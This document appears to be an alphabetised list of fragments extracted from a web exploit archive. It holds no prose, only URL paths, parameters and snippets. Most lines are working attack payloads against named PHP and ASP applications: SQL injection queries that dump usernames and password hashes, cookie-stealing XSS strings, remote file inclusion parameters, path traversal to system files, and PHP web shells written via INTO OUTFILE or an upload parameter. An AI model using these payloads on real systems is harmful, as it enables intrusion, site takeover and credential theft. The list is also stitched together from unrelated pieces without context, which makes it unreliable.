","",$urltarg));
","",$urltarg)));
",$urltarg)) $urltarg .= "
url_tgz
URL_to_Serendipity_Weblog
 URL to vulnerable ZP install (no trailing slash!!)
' . $url unless ( $url =~ 
url_visit
ursite
urun.mdb
urx.in
us
usage
usa-homeland.org
Use a http proxy
user
/?user
[user]
user--
user()
/?user=1
user1_1264680573.php.gif
user(),2,3,4,1,1,1,1,1
user-add.php">
user_add.php" method="post">
useradmin.php
useradmin.php?flag=insert">
useragent.inc.php?include_path=[darkcode]			[»]
user_aktiva_kunder.php
 usera passb\n");
user_auctions.inc.php?install_root=[Shell]
user-avatar
userbar-plugin
userbidhistoryauctions.php?id=65'					   #
user_carts.php the code is executed:
User.class.php?gfwww=[Shell]
user_config.php
user_confirmation.inc.php?include_path=[darkcode]		[»]
user_contacts.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
usercp
usercp2.php?tid='[sql_query]
usercp.php
usercp.php?action=avatar&gallery=..
usercp.php?action=avatar&gallery=%22%3E%3Cscript%3Ealert(1)%3C
usercp.php?action=avatars&sid=&page=1 (2 Upload)
usercp.php?action=do_avatar&gallery=..
usercp.php?action=do_options??;showcodebuttons=1?,additionalgroups=4
usercp.php?action=newpass&id=1' or 1='1&lilil=400&new=hacker
usercp.php?action=newpass&id=1' or password='&lilil=400&new=hacker
usercp.php?action=notepad
userCP.php?loggedIn=1&activated=1		#
usercp.php" method="POST">
usercp.php?mode=edit_profile
usercp.php?mode=edit_profile)
user_create_edit.php?id=78 and(select 1 from(select count(*),concat((select (select password) from `ac_users` limit 1,1),floor(rand(0)*2))x from `information_schema`.tables group by 2)j)
user.dat
user.dat                                           #
user_delete.php?id=8" method="post">
userdemo
userDetail.php?id=487[SQL-INJECTION!]
_userdetails
userdetails.php?id=USERID
user.edit.account.php
user.edit.account.php 
user_edit&modified=1&id=admin" method="POST">
user_edit.php
user_edit" we # can submit the parameters : password_new ; password_conf ; phone ; fullname ; e-mail with POST request . We can exploit  # it by sending crafted html page to the administrator (The connected privileged user) with customized values .To patch    # this vulnerability the developpers must integrate an anti-bot system like CAPTCHA in the application .
user_feedback.inc.php?install_root=[Shell]
user_fields.php?
userfiles
$userfiles
UserFiles
userform.php
user.form.php?id=2
user.form.php?ID=2+and+1=1337 False , You
user.form.php?ID=2+and+1=1 True , You get
user.form.php?ID=2+and+substring(version(),1,1)=5
userform.php" method="POST">
user_form&user_id=7322f75cc7ba16db1799fd8d25dbcde4' and '1'='1
user_form&user_id=c88ce1c0ad365513d6fe085a8aacaebc' and '1'='1
user-func.php?myadmindir=[Shell]
userFunctions.php?udef=activity&type=shell.php&content=<?php system($_GET['cmd']); ?>
usergroupid=6
user_guide
user_home.php?gfwww=[Shell]
user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0x3a,pass),19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1
[user_id]
user_id
user_id=1
userid=1
userid=1),1,1))>1
 <userid, default=1>   *"
 <userid, default=1> *"
USER_ID" method="post" name="main">
userid=".$uid."),1))>0");
userid=".$uid."),".$counter."))=".$ascode."");
userid=".$uid."),".$countersalt."))=".$ascodesalt."");
userimages
user_images
user.inc.php?install_root=[Shell]
user.inc.php?lang_path=[cmd_url]
user_info.inc.php?install_root=[Shell]
userInfo.php" method="post" name="main" id="main">
userinfo.php?uid[]=1
userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1
userInfo.php?uInfo=-1$sqli HTTP
userinfo.php?user=-1' UNION ALL SELECT 1,2,3,4,5,6,7,8,CONCAT(name, 0x3a, passwd_hash),10,11,12 FROM users%23
userinfo.php?userid=-3+union+select+concat%28username,0x3a,password%29,2,3,4,5,6+from%20cal_users
userinfo.php?userid=-3+union+select+username,2,3,4,password,6+from%20cal_users
userinfo.php?userid=[sql]
userjournals_menu
userjournals.php?blog.-9999 union all select 1,2,3,4,5,6,user_password,8,9,0,11,12,13 from e107_user--
userjournals.php?blog.[exploit]
user_kundlista.php
user_kundnamn.php
user_level=1
user_level.php
userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
user.login.php
userLogin.php?config[forum_installed]=[evilc0de]
userlogins
userloginss
user.mainpage.php
user.mainpage.php and change profile admin at 
usermanagement
user_management.php?foobar="><script>alert(123);<
usermanager.php?action=obradi&id=1'[SQL_Injection]
user_managment
user_manual.php
user-meta
usermgr.php?page[]
user.modify.profile.php )
user.modify.profile.php?userid=1
usermusic
username
<username> 
[username]
[username] 
$username
username),
username=0x61646D696E
username,1,password
[username].dtb\0
user_name[id].php
username:pass@192.168.1.3
[username].php?cmd=cat%20
user_new_2.php?home=[SHELL]
user-new.php">
USERNUMBERblah.jpg.php to access the php script
userpanel.php?CONFIG[directories][userpanel_dir]=[evil_code]
user:pass@ftp.attacker.ltd
user_password.php?id=1' AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a%2b1)%252)))%20--%20" method="post">
user-photo
user_photo.php
user.php
user.php">
user.php",
[user].php%00 
user.php?action=delete&user_id=[VID]
user.php?action=insert">
user.php?action=manageimages&upload=upload\r\n";
User.php?Action=New
user.php?act=order_query&order_sn=' union select 1,2,3,4,5,6,concat(user_name,0x7c,password,0x7c,email),8 from ecs_admin_user
user.php?aXconf[default_language]=..
user.php?email=[SQL]&action=send-password-now
user.php?func=edit_prefs&w=my_weblog
user.php?func=reg_user&w=my_weblog
user.php?gfcommon=[Shell]
user.php?id=1'[sqli]
user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--
user.php?id=999%20union%20select%201,User,Password,Host,File_priv,0%20from%20mysql.user
user.php?id=-999' UNION SELECT 0,0,user_name,	#
user.php?id=[SQL]
user.php?login=[VALID_FRIEND]&view=addfriend
user.php?login=[VALID_FRIEND]&view=removefriend
user.php" method="POST" enctype="multipart
user.php?MK_PATH=[ shell ]?
user.php?n=-99'+union+select+0,1,2,3,usuario,password,6,7,8,9,10,11,12,13,14,15,16+from+usuarios
user.php?n=<script>alert(
user.php?op=client_invoice&db_table=client_invoice&tile=myinvoices&print=&id=invoice_id|2869[SQL]
user.php?op=confirmnewuser&module=NS-NewUser&uname=%22
user.php?op=delvote&bugid=[SQL]
user.php?op=loginconfirm&returnto="><script>alert(123);<
user.php?op=">&lt;script&gt;alert(document.cookie)&lt;
user.php?op=menu&tile=mysupport&type=details&id=(existing id number)[SQL]
user.php?op=menu&tile=mysupport&type=view&id=1[SQL]
user.php?op=userinfo&uname=
user.php?op=userinfo&uname=<script>alert(document.cookie);<
user.php?op=userinfo&uname='+union+select
user.php?pass1=AMol_NAik&pass2=AMol_NAik&blogid=1&act=change
user.php?pass1=&pass2=&blogid=&act=change
user.php?submit=Modify+User&item=2&caller=
user.php?user=<
user.php?userId=-496'+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x203a20,id,nickname,password),11,12,13,14+from+ch_user--+
user.php?xoops_redirect=%2Fmodules%2Fprofile%2Factivate.php%3Fop%3Dactv%26id%3D15%26actkey%3D&PHPSESSID=7ed3f806816476461a96e18c28044414\r\n";
userpics
user_portal.php?include=..\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini%00.html
user_portal.php?include=..\\main\\upload\\$_riot&cmd=$cmd");
user_profile_edit.php" method="post">
user_profile.php
user-profile.php?userid=[id number][SQL]
user-profile-skype-id
user_read_links.php?category_id=' UNION SELECT 1,1,1,1,1,1,concat(email,0x3a,ip),1,1,1,1 FROM Linklisttable
user_register.php
 user.registration.php?redirect=admin.manage.users.php
user.registration.php?redirect=admin.manage.users.php
userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
userreg.php?langsel={SQL}
user-role-editor
user='root
User='root
users
users";
Users
users.add-edit.php
users_add.php">
usersadd.php">
users_admin.ghp">
users_age
users.conf
users.dat
users.dat   
users.dat) <
users.db.php%00
usersel.php?form=editentryform.elements[20];%0d%0aalert(document.cookie);
usersel.php?gfplugins=[Shell]
usersettings.php
usersettings.php 
UserSettings.php?">
usersgroups.site.php?action=deleteuser&id=[user ID] 
usersite
users.list.php
users_logins
usersL.php3?L=russian&R='%20UNION%20SELECT%20email,null,null,null%20FROM%20%20c_reg_users%20
usersL.php3?L=russian&R='%20UNION%20SELECT%20password,null,null,null%20FROM%20%20c_reg_users%20
usersL.php3?L=russian&R='%20UNION%20SELECT%20username,null,null,null%20FROM%20%20c_reg_users%20
usersL.php3?L=russian&R='[SQL]
users_maint.html?itemid=52&maint=1&ccsForm=users" method="post" name="f1">
users_maint.php?ccsForm=users_maint" method="post" name="main" 
users.mdb
usersonline
users.php
users.php 
users.php">
users.php?action=actions&member_id=VALIDUSERID
users.php?action=edit&member_id=VALIDUSERID
users.php?action=edit_payment&payment_id=VALIDPAYMENTID&member_id=VALIDUSERID
users.php?action=edit&userid=[SQLi]
users.php?action=email&user_id=%3E%3Ciframe%3E
users.php?action=groups&order=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
users.php?action=&limit=100%3Ciframe%3E
users.php?action=<script>alert(0)<
users.php?action=view&user_id=[VID]%3E%3Ciframe%3E
users.php?act=lost_password_go 1 \n";
users.php?a=profile" method="post" 
users.php?DATA=[PHP code]
users.php?do=add">
users.php?do=add" method="post">
users.php?do=addnew" method="post">
users.php?do=docreate"
users.php?gfplugins=[Shell]
users.php?header_prog=[Evil_Script]
users.php?idu=-1)%20UNION%20SELECT%20@@version%23
users.php?idu=-1) UNION SELECT @@version%23
users.php?JsHttpRequest=0-xml">
users.php?letter=FIRSTLETTEROFYOURUSERNAME
users.php?letter="><script>alert(0)<
users.php?LOGIN=[PHP code]
users.php?mail=1>
users.php?message=<script>alert(document.cookie);<
users.php?MESS=[PHP code]
users.php" method="post">
users.php" method="post" 
users.php?mode=profile&uid=<script>alert(document.cookie)<
users.php?module_dir=[REMOTE_FILE]
users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527
users.php?m=profile&a=avatarselect&x=XVALUE&id=default.gif[SQL Inject]
users.php name=main> <input
users.php?page=user-role-editor.php&action=default&user_role=administrator
users.php?pseudo=Username&email=E-Mail@of.the.new.admin.com&fname=First-Name&lname=Last-Name&password=Password&submit=Confirm&do=add_confirm
users.php?q=VALIDUSERNAME&q_where=anywhere&action=search_by_string
users.php?rid=Non_Numeric&uid=-1&username=[Any_Word_or_your_code] 
users.php?rid=Non_Numeric&uid=-1&username="><script>alert(document.cookie);<
users.php?role=5&p=admin";
users.php?role=5&p=test    [Vulnerable : firstname , lastname]
users.php?root_path=[evil_scripts]
users.php?status="><script>alert(0)<
users.php?status= (this will always return the HTML Injection)
users.php?task=edit&id=13" method="post" onsubmit="return userFormCheck()">
users.php" via http POST 
users_popuph.php?B=1&From=remotelogin.php&L=hebrew&LastCheck=[Blind SQL]
users_popupL.php?From="><script>alert(29837274289742472);<
users_report.php?rghtMenu=rghtMenu3&orderby=[SQL-INJECTION]dDatejoin
users " % rhost
userstat&filename=[admin_name].stat
user_stats.php?user=2000' and sleep(10)='
user_stats.php?user=shtuasvb&begin_date=2012-09-07&end_date=2012-09-07{HTPP}
users-zza21.mdb
usertag.php?do=profile&action=hashsubscription
/?user_uid=1&op=forms&form=..
/?user_uid=1&op=reports&report=..
userup
user_updated.php"
user_updates.php?user=test21%27%20UNION%20SELECT%201,2,3,4,@@version,6,7,8
user_updates.php?user=test21' UNION SELECT 1,2,3,4,@@version,6,7,8
user_uploads
user(),user(),user(),version(),user(),user()
UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,1)='a')--
UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=mid(Password,1,2)='ab')--
UserView_list.php?a=search&value=1&SearchFor=abc&SearchOption=Contains&SearchField=Password like '%%')--
userwww.service.emory.edu
user.xml
 uses no security at all, just a boolean 
Use your intelligence
ush
using
using-joomla
~usit
usr
usrdetails.php?sgnuptype=%22%3E%3Cscript%3Ealert(document.cookie)%3C
usr_ent.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
usr_file
usr_files
usr_hits
usrPortrait.inc.php?lang_path=[cmd_url]
usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
uss.php?action=2&done=1&n=-99'+union+select+0,1,2,usuario,password,5,6,7,8,9,10,11,12,13,14,15,16+from+usuarios+where+usuario='adm'
uss.php?action=2&done=1&n=<script>alert(
ust.php
usuarios
usuarios.dat <- Passwords disclosure
usuarios.lycos.es
utdb_access.php?minsoft_path=Shellz?
utenti--
utenti.lycos.it
utenti.tripod.it
utf8-cutenews
utgn_message.php?minsoft_path=Shellz?
util
utilisateur.class.php?path_om=[Shell]
utilisateur.class.php?path_om[Shell]
utilisateur.php">
utilisateurs
utilitaires
Utilities
utility
__utility
util.media.php?GLOBALS[where_cms]=[cmd_url]
util.php?AIbasedir=[php shell]
utils
utils.class.php?path_om=[Shell]
utils.php?dbs_base_path=[SHELL]
utils.php?donsimg_base_path=[SHELL]
utm-hardware
","",$u_url);
uwcms.sourceforge.net
uye_paneli.php?islem=bilgilerim
/?v=(.+?)<\
v0.02
v0.1%20public%20beta
v0.4b%20-%20RC2.rar
v1
v108
v1.1.0
v1.6
v1d30
v2
v2-1-0-build-3-v3-0-1-build-3-released
/?v=2.14.6
v22
/?v=2.2.2<
v23
v250beta3
V2A_XHTML
v2demo
V3
v3livesupport-v304
v3profiles
v4
v4.1.2
v46iyd.png
v4-team.net
v5
v6
v6                     ##\n";
v7USQ
vacation
vaccin.class.php?path_om=[Shell]
vairux-ego
validate.php?toocheckout=asdf
validateUser.php?u=test'
validerp
ValidForm
[VALID_FRIEND]
validsession.php?strRootpath=');}
valor.php?noticia=-1+union+select+0,1,2,database(),4,5--
valor.php?noticia=-1+union+select+0,1,2,user,pass,5+from+login--
valor.php?noticia=[SQL-Injection]
values.php?donsimg_base_path=[SHELL]
vamshop.ru
Van2ShoutData&del=1337
Van2ShoutData&newpost=testmessage
van2shout-plugin]
van2shout-plugin-1.051]
vangogh
vangogh.holoclan.de
[vangogh_path]
vaniarupeni.altervista.org
vanilla
vanillaforums.org
vanillaforums.org    
vanilla.tld
var
varcade
vars.inc
vb
vb>
vb> #
vb            |
vb-3-8-x-addons-and-template-modifications
vbb 10 10\n";
vbb-changuondyu-advanced-statistics-sql.html
vbb test test 10 10\n";
vbb test test index.php\n";
", vbCritical, "See You back again :D !!")
vbecommerce.php?do=product&productid=2
vbecommerce.php?do=purchase&act=product&id=2
vbecommerce.php?productid=20&do=product
vbhacker.net
vboard
vbplaza.php?do=item&name=bank'
vbseo_getsitemap.php?sitemap=sitemap_index.xml.gz
vbseo.php?vbseoembedd=1&vbseourl=[LFI]
vbseo-security-bulletin-all-supported-versions-patch-release-52783
vbseo_sitemap
vbseo_sm_calendar.php
vbseo_sm_downloads2.php
vbseo_sm_downloads.php
vbseo_sm_medialibrary.php
vbseo_sm_vbagallery.php
vbseo_sm_vba_links3.php
vbseo_sm_vba_links.php
vbseo_sm_vba.php
vbshout.php?do=..
vbshout.php?do=[PATH
vbshout.php?do=profile&action=customcommands
vbugs.php?do=list&s=&textsearch=&vbug_typeid=0&vbug_statusid=0&vbug_severityid=0&vbug_versionid=0&assignment=0&sortfield=lastedit&sortorder=%22%3Cscript%3Ealert('r0t')%3C
vbulletin
vbulletin-core.js?v=
vbulletin-core.js?v=(value)
vbulletin-google-site-map-3976.html
vbzoom
VBZooM
vbzoomforum
vcalendar_asp
VCalendar.mdb
vcard
vcard.class.php
vcard.php?id=[sql-injection]
v-descs
VDS
vedi
vedi_faq.php?id=666
vedi_faq.php?id=[INDONESIANCODER]
vegadns
vehicle
vehicule.class.php?path_om[Shell]
vel_file_uploader_v1.1
velid3
vendor_category_form&vendor_category_id=6' and '1'='1
vendor_form&vendor_id=1' and '1'='1
  ======> Vendor site
 ====> vendor site =)) hahahahaaaaaa ====>    2.1.3
venomboard
venue.nu
venues.php?idfestival=7 (SQL)
ver_agente&get_agents_group_json=1&id_group=1
ver_agente&id_agente=1%20union%20select%201,concat_ws%280x3a,id_usuario,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20FROM%20tusuario%20order%20by%202
ver_agente&id_agente=1%20union%20select%201,concat_ws%280x3a,id_usuario,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20FROM%20tusuario%20order%20by%202 width=500 height=500>
ver_agente&id_agente=1%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20order%20by%202
ver_agente&id_agente=1%20union%20select%201,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18%20order%20by%202 width=500 height=500>
verfoto.php?id=
verfoto.php?id=1+and+1=1 [and+1=2]
verfoto.php?id=<marquee><font color=Blue size=15>XroGuE<
verifyemail.php?thispath=[EV!L]
Verisign_logon.php?redirect="+onclick=alert(123)+w="
verMensajes.php
verMensajes.php?operacion=op0001' || (case when 10<1 then '1' else '2' end) || '
ver-noticia.php?id=
ver-noticia.php?id=-9999+and+1=2+union select 1,version(),3,4,5,6,7,8,9--
ver-noticia.php?id=<marquee><font color=Blue size=15>XroGuE<
versatile100RC2.html                            #
version
version11
/?version=1.1.02
" version="1.5.2">WordPress<
Version-1.822
version2
version(),2
Version%201.2
version(),2,3--
version2.3
version(),2,3,4,1,1,1,1,1
version2.3.7
version2.3.8
 Version 2.9
version3.3
) version 3.5 sql injection exploit
version7.10
Version-7-12-2
versionen
version-history
versionhistory.htm
versions
Versions
 Version trunk
" version="(.+?)">Word(P|p)ress
Version?xsd=..
vert
vertical-markets
verve-meta-boxes
vhcp.verlihub- project.org
vhcs2
vhdwebpack
vhostadmin
#{vhost}:#{rport}#{datastore['URI']}"
vhosts
vhosts.conf
) via Dominus
via-ferrata
Vibro-CMS
Vibro-School-CMS
vicidial
vicidial_demo
[vicim]
victim
<victim>
'+ victim +'
[victim]
$victim
victim<
[Victim]
[VicTim]
VICTIM
[VICTIM]
VİCTİM
victim.co.il
Victim.Com
victime
$victim" if !($victim =~ 
victim.it
[victim].org
victim.org
victim.pl
VICTIM_SERVER
victimsite
victim site
victim.tld
[VICTIM URL]
vidalcharles.free.fr
video
video_admin.php?type=v (2 upload video) Use Tamper Data
video_ad.php?pic_id="><script>alert(document.cookie);<
videoaudio
videocommunity
videocommunity_portalscript.html
VideoController.php?baseDir=[evilcode]
videodb
videodb.class.xml.php?mosConfig_absolute_path=[shell]
[videodb_path]
video_gallery.php?member_id=-1
video.html					     |
VideoIsland
videolink_count.php?id=-1+union+select+concat(admin_user,char(58),admin_pass,char(58),admin_email)+from+admin
video_listing.php?category=42&sort=2&key="><script>alert(document.cookie);<
video.php?id=-4444 union select swfurl 2 3 4 5 6 7 8 9 10 11 12 13 14 15 from  archive
video.php?id_att='111
video.php?id_att=[SQLI]
video.php?id= SQLi
video.php?videoid=[sqli]
video-players-a-gallery
videos
videoscript
videoscript.co.uk
videoshare.htm
videosharing.html                     ##\n";
video-sharing-script-eula.html
video_show.php?id=SQL
videos.php
videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
videos.php?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,load_file('[path_you_just_found]
videos.php?id=-1%20UNION%20SELECT%201,'<?php%20system($_GET[cmd]);%20?>',3,4,5,6,7,8,9,10,11,12,13,14,15%20INTO%20OUTFILE%20'[path_founded]
videos.php?id=-1%20UNION%20SELECT%20name,news,vids_per_page,version,template,6,7,8,9,10,11,12,13,14,15%20FROM%20pp_config
videos.php?id=-44+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15--
videos.php?id=-56+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14--
videos.php?id[]= (path disclosure)
videos.php?id=[SQL]
videos.php?model=
videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C
videos.php >> shell.php
videowhisper-video-presentation
vidgoster.php?vid=1'
view
&view=1<script>alert("abysssec")<
ViewAccountPage.class.php?base_path=[evil_scripts]
viewaccount.php?id=[SQLi]
viewaction.html?messageid=....
viewaction.html?messageid=cmd.exe&action=delete&originalfolder=c:
viewaction.html?Move_x=1&user=..
viewaddedenquiry.php?id=[SQli]
view_ad.php?id=
/?view=ads&catid=-1+union+select+concat(email,0x3a,code)+from+clf_ads--
view_album.php?album_id=-1%20UNION%20%20SELECT%20$info%20FROM%20user");
view_album.php?album_id=-1%20UNION%20%20SELECT%20username%20FROM%20user
viewalbums.php?artistId=-1
viewalbums.php?artistId=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--
view_all_set.php?sort=severity&dir="><script>alert(document.cookie)<
view_all_set.php?type=1&reporter_id=5031&hide_status=80<script>alert('hi')<
view_ann.php?ann_id=-6+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users
view_article.php?articleid=12242'
view_article.php?articleid=-12242+union+select+all+1,2,3,version(),user(),6,7,8,9--
viewArticle.php?id=[value]+and+1=0+[evil query]	|
view.asp?CatID=1&Pic=&#039;
view.asp?id=1+union+select+0,1,2,Password,Password,5,6+from+Users
view.asp?id=1+union+select+0,1,2,Password,UserName,5,6+from+Users
view.asp?id=1+union+select+0,1,2,UserName,Password,5,6+from+Users
view_blog_archives.php?row_y5_site_configuration[templates_folder]=[EV!L]
ViewBlogArticle?contentId=BLG10000\<script>
view_blog_comments.php?row_y5_site_configuration[templates_folder]=[EV!L]
view-blog-full.php?blid=69[CODE]
view.blog.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),user(),version(),6+from+joovili_admins
view.blog.php?id='+union+select+1,2,concat_ws(0x3a,username,password),user(),version(),6+from+joovili_users
viewboard.php
viewbrands.php?bid=[SQL]
view_businessnews.php?articleid=7'
view_businessnews.php?articleid=-7+union+select+all+1,2,3,version(),user(),6,7,8,9--
ViewCal.html?item_type_id=[code]
view_caricatier.php?CaricatierID='><script>alert(document.cookie);<
view_caricatier.php?CatID='><script>alert(document.cookie);<
view_caricatier.php?CatName='><script>alert(document.cookie);<
view_caricatier.php?op=open&CatID=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B<
view_cart.php?add='
view_cart.php?add=%27
viewcategory
viewcat.php?cat=I'%20union%20select%201,2,3,4,5,6,7
ViewCat.php?CatID=-8+union+select+1,email,3+from+users
viewcat.php?cid=1
viewcat.php?cid=5
viewcat.php?cid='6
viewcat.php?cid=8
viewcat.php?id=10
ViewCat.php?s_user_id='+union+select+user_password+from+users+where%20user_id=1
view_channel.php?user=0%27%20UNION%20SELECT%201,2,3,version%28%29,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10%20--%202
view_collection.php
view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
viewcomments.php?phid=-1+union+all+select+1,concat(password,username),3,4,5,6+from+admin
viewcomments.php?phid=-1+union+all+select+1,@@version,3,4,5,6
viewcomments.php?phid=[SQLi]
view_contact_details.php?SellerID=(Blind) or (SQL)
ViewController.php?baseDir=[evilcode]
view_cresume.php?coder_id=-1
view_current_job.php?jid=[id number][SQL]
ViewDay.html?start=2453810&&integral=0&style_sheet=[code]
ViewDay.html?start=2453810&&integral=0&style_sheetuserStyle.css&dropdown=1&show_stop=0&show_resources0&calendar_id=[code]
ViewDay.html?start=[code]
View-details
view_details.php?sortitem=report_date&sortorder= SQLi
view_details.php?sortitem= SQLi
view_dimension.php
/?viewdoc=17
/?viewdoc=24
/?viewdoc=25
/?viewdoc=27
/?viewdoc=28
/?viewdoc=29
/?viewdoc=30
/?viewdoc=33
/?viewdoc=35
/?viewdoc=36
/?viewdoc=38
/?viewdoc=40
/?viewdoc=41
/?viewdoc=47
/?viewdoc=48
/?viewdoc=51
/?viewdoc=52
View-document-details
ViewDomainServicePage.class.php?base_path=[evil_scripts]
/?view=download&dload=1
view_d.php?gfplugins=[Shell]
&viewemail=0&showemail=1&html_msg=0&usertheme=portal&spam=regnotspam&remain=279&post={$email}&left=279&I1.x=72&I1.y=6";
view_entry.php?gfplugins=[Shell]
view_entry.php?id=41972&date=20041001&is_admin=true&is_nonuser_admin=true&is_assistant=true
viewer.php?APP[path][core]=[evil_scripts]
viewer.php?id=-1 union select
viewer.php?path=
viewers
view_event.php?id=-1'
view.event.php?id='+union+select+1,2,concat_ws(0x3a,admin_username,admin_password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_admins
view.event.php?id='+union+select+1,2,concat_ws(0x3a,username,password),4,5,6,7,8,9,10,11,12,13,14,15+from+joovili_users
view_events.php?cat_id=-1
viewFAQ.php?action=edit&FAQ_ID=[SQL]
viewFAQ.php?action=[SQL]
view_faq.php?question=-4+AND+1=2+UNION+SELECT+0,1,2,version%28%29,4,5--
viewfaqs.php?cat=-1%20union%20select%20concat(id,0x3a,username,0x3a,password)%20from PHPAUCTIONXL_adminusers--
viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=4
viewfaqs.php?cat=1+and+1=1+and+substring(@@version,1,1)=5
viewfaqs.php?cat=1+and+1=1 false
viewfaqs.php?cat=1+and+1=1 true
viewfaqs.php?cat=null
viewfavorites.php?tempstyle=[EV!L]
view_feedback.php?id=-62+union+select+1,2,3,4,5,6,7,8,9,10,0x3c68313e484552453c2f68313e,12,13,14,15,16,17,18--
view_feedback.php?id=null+union+select+1,2,3,4,5,6,7,8,9,10,concat%28admin_name,0x3a,pwd%29,12,13,14,15,16,17,18+from+sbauctions_admin#
viewfeedback.php?view=1'[SQL] 
viewfeedback.php?view=all&start=1'[SQL]
view_file.php
viewfile.php?f=[file base64 encode ]
viewfile.php?f=Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
view_filters_page.php?for_screen=1&target_field=%22%3E%3Cscript%3Ealert('r0t')%3C
viewforum.php?f=3
viewforum.php?forum_id=1&lastvisited=' 
viewforum.php?id=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%7
viewforum.php?id='1%3E%22%3Cscript%3Ealert(document.cookie)%3C
viewforum.php?id='1 (FPD)
viewforum.php?id=-1' UNION ALL SELECT 1,2,GROUP_CONCAT(CONCAT(username, 0x3a, password)),4,5,6,7,8 FROM celer_users%23
viewforum.php?id=1+union+select+1,2,group_concat(username,0x3a,password),4,5,6,7+from+cms_users-- (SQLi)
viewforum.php?id=t=123456&postorder=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63
viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C
view_full_size.php?i=1&item_id=-2904+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58--
/?view=gameserver&grp=-1'+union+all+select+1,concat(username,0x3A,password),3,4,5,6,7+from+jos_users%23
/?view=gameserver&grp=[SQL]
viewgit.fealdia.org
view_group.php?group_id={SQLI}
view_group.php?id=-1+union+select+0,'Im-IRAQI',concat_ws(0x3a,username,password),0,0,0,0,0+FROM+apb_users--
view_group.php?id=-4
view_group.php?id=-4+union+select+0,1,concat(username,0x3a,password),3,4,5,6,7+from+apb_users--
view.group.php?id='+union+select+1,2,user(),4,5,6,7,8,9
viewhistorydetail.php?planid=[Sqli]
ViewHostingServicePage.class.php?base_path=[evil_scripts]
view_image.php?
view_image.php?id=416+and+1=0+Union+Select(UNEXVISIBLECOLUMN)+2+3
view_image.php?id=XX
view_image.php?id=XX+AND+1=2+UNION+SELECT+concat(database()),2,3-
viewimg.php?id=-1+union+select+0,1,2,3,4,user(),6,7,8--
viewimg.php?id=-1 UNION SELECT 0,1,2,3,4,VERSION(),6,7,8
viewimg.php?path=images.d
view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1
view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info
view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif1=<script>alert(document.cookie)<
view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_exif2=<script>alert(document.cookie)<
view_info.php?_SESSION[pixelpost_admin]=1&cfgrow[password]=1&view=info&admin_lang_pp_path=<script>alert(document.cookie)<
Viewing Profile: (.*)<\
view=[Injection payload]
ViewInvoicePage.class.php?base_path=[evil_scripts]
viewinvoice.php?invoiceID=[SQL]
view_item.php
viewitem.php?Codebase=[Shell]
